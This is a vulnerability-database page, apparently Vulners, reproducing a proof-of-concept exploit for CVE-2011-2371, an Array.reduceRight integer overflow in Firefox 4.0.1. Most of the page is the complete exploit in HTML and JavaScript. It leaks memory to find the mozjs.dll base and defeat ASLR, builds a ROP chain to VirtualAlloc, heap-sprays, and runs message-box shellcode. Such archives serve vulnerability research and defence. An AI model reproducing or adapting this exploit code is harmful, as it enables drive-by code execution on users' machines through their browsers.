Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mozilla Firefox 4.0.1 Integer Overflow

🗓️ 27 Feb 2012 00:00:00Reported by pa_ktType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 52 Views

PoC exploit for CVE-2011-2371 against Firefox 4.0.1 with details about constant switches and blog references

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mozilla Firefox Array.reduceRight() Integer Overflow Exploit
11 Oct 201100:00
zdt
0day.today		Mozilla Firefox Array.reduceRight() Integer Overflow
12 Oct 201100:00
zdt
0day.today		Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit
27 Feb 201200:00
zdt
Tenable Nessus		Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		Mozilla Firefox > 4.0 and < 5.0 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		Mozilla Firefox 3.6.x < 3.6.18 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		Mozilla Thunderbird 3.1.x < 3.1.11 Multiple Vulnerabilities
21 Jun 201100:00
nessus
Tenable Nessus		CentOS 4 / 5 : firefox (CESA-2011:0885)
23 Jun 201100:00
nessus
Rows per page
`<!--  
PoC exploit for CVE-2011-2371  
tested against Firefox 4.0.1  
md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4  
change constants to switch between w7/xp.  
see my blog if you want to know how this works.  
http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/  
p_k  
twitter.com/pa_kt  
gdtr.wordpress.com  
-->  
<html>  
<script src="jspack.js"></script>  
<script>  
function hex(x){  
var y = x.toString(16);  
y = "0x"+y;  
return y;  
}  
function itoa(i)  
{  
return String.fromCharCode(i);  
}  
// n - length in bytes (1 unicode char = 2 bytes)  
function puff(x, n){  
while(x.length < n) x += x;  
return x.substring(0,n);  
}  
function arr2hex(tab){  
var s = "";  
for(var i in tab){  
x = tab[i];  
x = x.toString(16);  
if(x.length<2)  
x = "0"+x;  
s += x + " ";  
}  
return s;  
}  
function arr2ascii(tab){  
var s = ""  
for(var i in tab){  
x = tab[i];  
if(0x20 <= x && x<=0x7f){  
y = itoa(x);  
}  
else{  
y = ".";  
}  
s += y;  
}  
return s;  
}  
function xchg(d,i,j){  
t = d[i];  
d[i] = d[j];  
d[j] = t;  
}  
function bswap(d){  
xchg(d, 0, 3);  
xchg(d, 1, 2);  
}  
function nicer(tab){  
jsp = new JSPack();  
res = [];  
for(var i in tab){  
x = tab[i];  
t = jsp.Pack("d", [x]);  
d1 = t.slice(0, 4);  
d2 = t.slice(4, 8);  
bswap(d1);  
bswap(d2);  
t = [d1,d2];  
res = res.concat(t);  
}  
res = res.reverse();  
return res;  
}  
function dw2int(d){  
n = 0;  
for(var i=0;i<4;i++){  
n *= 256;  
n += d[3-i];  
}  
return n;  
}  
function convert(tab){  
o = s = v = "";  
for(var i in tab){  
d = tab[i];  
s += arr2hex(d);  
v += arr2ascii(d);  
if((parseInt(i)+1)%4==0){  
o += s + " | " + v + "\n";  
s = "";  
v = "";  
}  
}  
return o;  
}  
function check_pair(d1, d2){  
var n1 = dw2int(d1);  
var n2 = dw2int(d2);  
if(n2-n1 == 0x304)  
return true;  
return false;  
}  
function find_mozjs_base(tab){  
var n1 = 0;  
for(var i=0;i<tab.length-4;i++){  
d1 = tab[i];  
d2 = tab[i+1];  
if(check_pair(d1,d2)){  
n1 = dw2int(d1);  
n1 = n1 - 0x3cac; //n1 = mozjs .data  
n1 = n1 - 0x1B2000; //n1 = mozjs base  
break;  
}  
}  
return n1;  
}  
function d2u(dword){  
var uni = String.fromCharCode(dword & 0xFFFF);  
uni += String.fromCharCode(dword>>16);  
return uni;  
}  
function odd_d2u(d1, d2){  
uni = String.fromCharCode((d1&0xFF)<<8);  
uni += String.fromCharCode((d1>>8)&0xFFFF);  
uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T  
uni += String.fromCharCode((d2>>8)&0xFFFF);  
uni += String.fromCharCode(d2>>24);  
return uni;  
}  
// generated with mona.py  
function rop_chain(mozjs_base){  
var arr = [  
mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll]  
mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll]  
mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll]  
mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll]  
mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll]  
mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll]  
mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll]  
0x00000001, // 0x00000001-> ebx  
mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll]  
0x00001000, // 0x00001000-> edx  
mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll]  
0x00000040, // 0x00000040-> ecx  
mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll]  
mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll]  
mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll]  
0x90909090, // nop  
mozjs_base + 0x001372bd // PUSHAD // RETN [mozjs.dll]  
];  
return arr;  
}  
function tab2uni(tab){  
var uni = ""  
for(var i=0;i<tab.length;i++){  
uni += d2u(tab[i]);  
}  
return uni;  
}  
function spray(mozjs_base, h1_s, hsize) {  
function rva2va(addr) { return addr+mozjs_base; }  
function rva2d(addr) { return d2u(rva2va(addr)); }  
var align = 0x100000;  
var tab_offset = 0x1000;  
var TYPE_OBJECT = "%u0007%uffff";  
var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN  
var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret  
var h2_s = h1_s + hsize;  
var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align  
//mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax  
var h2_ptr = h2_middle + tab_offset;  
var off1 = h2_ptr;  
var off2 = h2_ptr-0x64;  
var v1 = d2u(off1);  
var h1_fill = unescape(v1+TYPE_OBJECT);  
var foo = puff(h1_fill, 0x4000);  
var h1_spray = foo.substring(0,(0x4000/2)-2);  
var pivot_va = rva2va(pivot_rva);  
pivot_va = d2u(pivot_va);  
off2 = d2u(off2);  
var new_ebp = h2_ptr+18;  
var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva);  
var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va);  
var rop = tab2uni(rop_chain(mozjs_base));  
//shellcode by skylined  
var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5";  
var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode);  
x = puff(x, 0x4000);  
var h2_spray = x.substring(0,(0x4000/2)-2);  
var spray_tab = new Array();  
for (i=0;i<0x1000;i++){  
spray_tab[i] = h1_spray+"1";  
spray_tab[i].indexOf("zzz");  
}  
for (i=0x1000;i<0x2000;i++){  
spray_tab[i] = h2_spray+"2";  
spray_tab[i].indexOf("zzz");  
}  
}  
var exploit_func =  
function bleh(prev, current, index, array) {  
//boom = typeof current;  
current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9  
//throw "up";  
}  
function trigger(func, arr_len){  
xyz.length = arr_len;  
try{  
xyz.reduceRight(func,1,2,3);  
}  
catch(e){ }  
}  
function leak(){  
var CHUNK_SIZE = 0x1000;  
var leak_arr_len = 0xffffffff;  
mem = [];  
count = 0;  
var leak_func =  
function bleh(prev, current, index, array) {  
if(typeof current == "number"){  
mem.push(current);  
}  
count += 1;  
if(count>=CHUNK_SIZE/8){  
throw "lol";  
}  
}  
function dump_mem(leak_f, arr_len){  
var dump = document.getElementById("dump");  
var mozjs_base = 0;  
for(var i=0;;i++){  
mem = [];  
count = 0;  
trigger(leak_f, arr_len);  
mem = nicer(mem);  
s = convert(mem);  
dump.innerHTML = s;  
//alert("leaked bytes: "+hex(mem.length*4));  
mozjs_base = find_mozjs_base(mem);  
//alert("mozjs base: "+hex(mozjs_base));  
if(mozjs_base != 0){  
break;  
}  
}  
return mozjs_base;  
}  
var base = dump_mem(leak_func, leak_arr_len);  
return base;  
}  
function go(){  
//var arr_ptr = 0x05000000; //(xp sp3)  
//var h1_s = 0x05b00000;  
//var h2_e = 0x0fb00000;  
var arr_ptr = 0x0b000000; //w7  
var h1_s = 0x0b500000;  
var h2_e = 0x16e00000;  
var size = h2_e-h1_s;  
var hsize = size/2;  
var h1_middle = h1_s+hsize/2;  
var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000;  
var mozjs_base = leak();  
spray(mozjs_base, h1_s, hsize);  
alert("ready");  
while(1){  
trigger(exploit_func, exp_arr_len);  
exp_arr_len -= 0x500;  
}  
}  
// globals  
var xyz = new Array();  
</script>  
<body>  
<input type="button" value="go" onclick="go()" />  
<pre id="dump">  
</pre>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Feb 2012 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.75691
exploitcve-2011-2371firefox 4.0.1constant switchesblogjspackmozillainteger overflowsecurity document
52